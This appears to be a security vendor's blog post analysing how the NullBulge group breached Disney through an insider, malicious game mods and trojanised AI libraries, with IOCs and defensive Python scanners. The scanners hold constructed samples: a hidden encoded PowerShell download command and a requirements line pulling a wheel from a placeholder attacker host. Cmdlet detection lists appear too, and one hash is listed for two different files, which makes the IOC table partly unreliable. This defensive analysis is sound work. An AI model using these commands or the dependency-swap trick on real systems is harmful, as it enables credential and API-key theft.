
Disney Security Breach

How Did Disney Get Hacked?

There are several possibilities as to how Disney was breached by NullBulge.

  1. The first is an insider threat, based on what NullBulge has since posted about the hack.
  2. The second is a malware package delivered either through a mod for the BeamNG game or through software called ComfyUI_LLMVISION, a tool used to visualize LLMs.

Who is NullBulge?

NullBulge is a furry hacktivist group that targets companies that use AI tools. Their stated mission is "protecting artists' rights and ensuring fair compensation for their work." The group is known for using open-source tooling such as LockBit payloads, AsyncRAT (a Remote Access Tool designed to monitor and control other computers remotely over an encrypted connection), and other info stealers.

ThreatLocker® Investigation  

The Insider Threat   

According to the blog post that NullBulge made, they used an insider. NullBulge leaked all of this individual's PI (personal information), including the contents of the person's password manager, bank information, and so on, because the person "didn't follow through." This insider was a technical lead who would have had access to Slack channels and the ability to export data from Slack.
 
ThreatLocker® reviewed most of the NullBulge leaks and the insider's PI. ThreatLocker® found evidence that Disney used AI tools for multiple applications, including text and image generation. The insider had also saved credentials for Disney infrastructure, other AWS (Amazon Web Services) infrastructure, gaming websites, modding websites, and more in their password manager. Research by ThreatLocker® showed that the Disney leak could have occurred when those password manager credentials were stolen after the person installed a malware package from NullBulge on their personal computer.

Malware Packages

ThreatLocker® found two GitHub accounts that NullBulge is known to use, Applebotzz and BeamerNGz. Applebotzz also has an account on a modding website. The Applebotzz account was confirmed to have been taken over by NullBulge using the first version of their info stealer. This account was then used to spread the info stealer further: the BeamNG mods and all the repositories on the Applebotzz GitHub account had malware packages inside each of them.

BeamNG Mods

The first version of the malware package that was posted to the modding site would download a zip file from the BeamerNGz GitHub account. The same repository also held an AsyncRAT tool called "BeamNG.UI.exe." Among the other repositories that BeamerNGz had, one contained a LockBit config.json file and a file called main_obf.py.

ThreatLocker® obtained two mods from the Applebotzz account and found that the versioncheck.lua file in each contained an encoded PowerShell payload.

[Figure: Mod 1 version 1, versioncheck.lua, shown before and after decoding]

[Figure: Mod 1 version 2, versioncheck.lua, shown before and after decoding]

The PowerShell command contains a misspelling of Invoke-WebRequest (the PowerShell cmdlet used to fetch content from the internet).


[Figure: Mod 2, versioncheck.lua, shown before and after decoding]
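As an added example (not the mod's actual code and not ThreatLocker's tooling), the following decodes the base64/UTF-16LE payload behind PowerShell's -EncodedCommand switch in a mod's Lua file and reports download-and-run cmdlets, including near-miss spellings like the one noted above, which would not execute as written but still show intent. The Lua snippet, the command and the URL are constructed; the real payload is not reproduced.

```python
import base64
import difflib
import re

# Cmdlets and aliases commonly seen in download-and-run PowerShell one-liners.
KNOWN_CMDLETS = ["invoke-webrequest", "invoke-expression", "start-process", "new-object"]
ALIASES = ["iwr", "iex", "curl", "wget", "downloadstring", "downloadfile"]
# -enc / -EncodedCommand followed by a base64 blob (PowerShell expects UTF-16LE inside).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_commands(text):
    """Return every decoded -EncodedCommand payload found in a file (None if undecodable)."""
    decoded = []
    for m in ENC_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            decoded.append(None)  # present but not valid base64/UTF-16: still worth a look
    return decoded

def scan_lua_mod(text):
    """Decode encoded PowerShell in a Lua file and report what each command tries to do."""
    findings = []
    for cmd in decode_encoded_commands(text):
        if cmd is None:
            findings.append({"decoded": None, "indicators": ["undecodable"], "near_misses": []})
            continue
        low = cmd.lower()
        indicators = [w for w in KNOWN_CMDLETS + ALIASES
                      if re.search(r"\b" + re.escape(w) + r"\b", low)]
        # A Verb-Noun token that almost matches a known cmdlet (like the typo noted above)
        # would fail to run as written, but still shows what the author intended to do.
        near = []
        for tok in sorted(set(re.findall(r"[a-z]+-[a-z]+", low))):
            close = difflib.get_close_matches(tok, KNOWN_CMDLETS, n=1, cutoff=0.85)
            if close and tok not in KNOWN_CMDLETS:
                near.append((tok, close[0]))
        findings.append({"decoded": cmd, "indicators": indicators, "near_misses": near})
    return findings

def build_sample_lua(command):
    """Constructed stand-in for a mod's versioncheck.lua; not the real file from the page."""
    enc = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
    return 'local version = "1.0"\nos.execute("powershell -w hidden -ep bypass -enc ' + enc + '")\n'

# Constructed sample whose cmdlet is misspelled, as the page describes (placeholder URL).
SAMPLE = build_sample_lua("Invoke-WebRequst -Uri https://example.invalid/u.txt -OutFile $env:TEMP\\u.txt")
```

Run scan_lua_mod over each versioncheck.lua in a mod archive; an empty indicator list with a non-empty near_misses list is exactly the misspelled case.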

ComfyUI 

The threat actors hosted a malicious extension for the application ComfyUI. ComfyUI is an application that makes it easier to design neural networks and GPTs by describing things such as training visually. NullBulge hosted a malicious extension called "ComfyUI_LLMVISION." The extension claims to add modules to ComfyUI for image processing, whether viewing or producing images.

The source code in the repository itself is safe. However, it depends on a malicious version of the OpenAI library hosted by the attacker. That version number was one minor version higher than the official release, so any application that installed the OpenAI package would run the malicious code. First, it would download and run a malicious executable in the \programdata directory. After that, it sends the OpenAI API key to the NullBulge Discord server and otherwise functions like the normal library.

The other library on which the ComfyUI extension depended was a malicious version of the Anthropic library. This library was less threatening, as it only stole the Anthropic API key and did not add a malicious payload to the system.
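One defensive check the ComfyUI case suggests, added here as an example and not code from ThreatLocker or the ComfyUI project: audit a requirements file for packages sourced from outside PyPI and for versions newer than anything already reviewed, which is how a higher-numbered malicious wheel gets picked over the official release. TRUSTED_HOSTS, VETTED_MAX and the sample requirements file are constructed, and attacker-host.invalid is a placeholder.

```python
import re
from urllib.parse import urlparse

# Constructed for this example (not page data): hosts pip may fetch from, and the newest
# version of each library that has been reviewed internally.
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}
VETTED_MAX = {"openai": "1.29.0", "anthropic": "0.25.9"}

def vtuple(version):
    return tuple(int(p) for p in re.findall(r"\d+", version))  # '1.30.2' -> (1, 30, 2)

def name_version_from_wheel(url):
    """'.../openai-1.30.2-py3-none-any.whl' -> ('openai', '1.30.2')."""
    parts = urlparse(url).path.rsplit("/", 1)[-1].split("-")
    return (parts[0].lower().replace("_", "-"), parts[1]) if len(parts) >= 5 else (None, None)

def audit_requirement(line):
    """Return the reasons one requirements.txt line deserves review (empty = nothing found)."""
    line = line.split("#", 1)[0].strip()
    reasons, name, version = [], None, None
    if not line:
        return reasons
    # Option lines redirect pip to another index or file listing, away from PyPI.
    if line.startswith(("-i", "--index-url", "--extra-index-url", "-f", "--find-links")):
        host = urlparse(re.sub(r"^\S+?(?:=|\s+)", "", line)).hostname
        if host not in TRUSTED_HOSTS:
            reasons.append(f"package source outside PyPI: {host}")
        return reasons
    # Direct references ("name @ URL" or a bare wheel) bypass the index entirely.
    m = re.match(r"^([A-Za-z0-9_.\-]+)\s*@\s*(\S+)$", line)
    if m or line.lower().endswith(".whl"):
        url = m.group(2) if m else line
        host = urlparse(url).hostname
        if host not in TRUSTED_HOSTS:
            reasons.append(f"direct wheel download from {host or 'a local path'}")
        name, version = name_version_from_wheel(url)
    else:
        pin = re.match(r"^([A-Za-z0-9_.\-]+)\s*==\s*([0-9][0-9A-Za-z.]*)", line)
        if pin:
            name, version = pin.group(1).lower(), pin.group(2)
    # A version above anything reviewed is how a higher-numbered malicious wheel slips in.
    if name in VETTED_MAX and version and vtuple(version) > vtuple(VETTED_MAX[name]):
        reasons.append(f"{name} {version} is newer than the vetted {VETTED_MAX[name]}")
    return reasons

# Constructed requirements file in the shape described above; the host is a placeholder.
SAMPLE_REQUIREMENTS = """torch==2.3.0
openai @ https://attacker-host.invalid/f/openai-1.30.2-py3-none-any.whl
anthropic==0.26.1
"""
```

Running audit_requirement over each line of SAMPLE_REQUIREMENTS flags the two AI-library lines and leaves the pinned torch line alone.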

IOC  

URL: http[:]//pixeldrain[.]com

SHA-256                                                           File name
fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4  BeamNG.UI.exe
fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4  Mod 2 Versioncheck.lua
66bceb84db56995b05fd175a3f7a79573684e7ca191ba8a3cd1395216fe51e2c  Mod 1 version 2 Versioncheck.lua
77ed83031925faf747e4644f446f0ecfe99c742fb8e49d32bdce0c5508dd1d62  Mod 1 version 1 Versioncheck.lua
35c362965f82d9be9e116643b9e2684c728ec87b55d34bada0a8a98ee6336c22  anthropic-0.26.1-py3-none-any.whl
efb37c08a958772366e8d80f9c19c4b3e026001e59a323ebff18a424df4c034d  openai-1.30.2-py3-none-any.whl
47067e90fc480f76baf40c751ea5577268520fb00fa7ca60bc3460c7907aeafa  VISION-D.exe

Conclusion 

NullBulge compromised Disney, most likely through the insider downloading a malicious package. Whether that was the ComfyUI extension used within the company or a malicious game mod downloaded by the employee, NullBulge used the employee's credentials to gain access to Disney resources.

How do you stay safe? 

  • Increase security around the use of password managers.
  • Use MFA on your password managers.
  • Be aware of where any exported password manager list is stored; ideally, do not export it at all.
  • Be wary of mods with few downloads, and check whether the uploader's account was created recently.
  • Be careful with open-source AI tools and review them before deploying them.

How ThreatLocker® Mitigates Risk

  1. Application Allowlisting: Allow only the applications you need to run and block all others by default. This also allows only certain users to use the approved software, preventing unauthorized tools from running on your system.
  2. Ringfencing™: Control what your allowed applications can do. For instance, you can prevent PowerShell from accessing the internet and downloading the payload.
  3. ThreatLocker® Detect: This can be used to detect anomalous PowerShell behavior.